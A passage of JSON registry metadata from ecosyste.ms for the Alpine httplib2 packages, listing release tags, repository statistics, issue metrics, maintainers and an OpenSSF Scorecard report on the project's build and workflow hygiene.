api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:36.190Z","dependent_packages_count":4,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":27.061059634117367,"stargazers_count":3.3499643620812543,"forks_count":2.3521026372059874,"average":8.190781658351153},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.6","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":213,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T12:16:15.954Z","updated_at":"2023-02-01T12:16:15.954Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.6","url":"https://pkgs.alpinelinux.org/packages?branch=v3.6","ecosystem":"alpine","default":false,"packages_count":8418,"maintainers_count":115,"namespaces_count":2,"keywords_count":564,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":255},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.872Z","updated_at":"2026-08-10T05:08:21.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/namespaces"}},{"id":6096484,"name":"py-httplib2","ecosystem":"alpine","description":"Python HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2018-05-01T18:31:50.000Z","latest_release_published_at":"2018-05-01T18:31:50.000Z","latest_release_number":"0.11.1-r0","last_synced_at":"2026-07-29T13:04:30.203Z","created_at":"2023-01-31T20:35:58.029Z","updated_at":"2026-08-21T17:29:57.686Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.8/main/x86_64/py-httplib2","install_command":"apk add py-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release 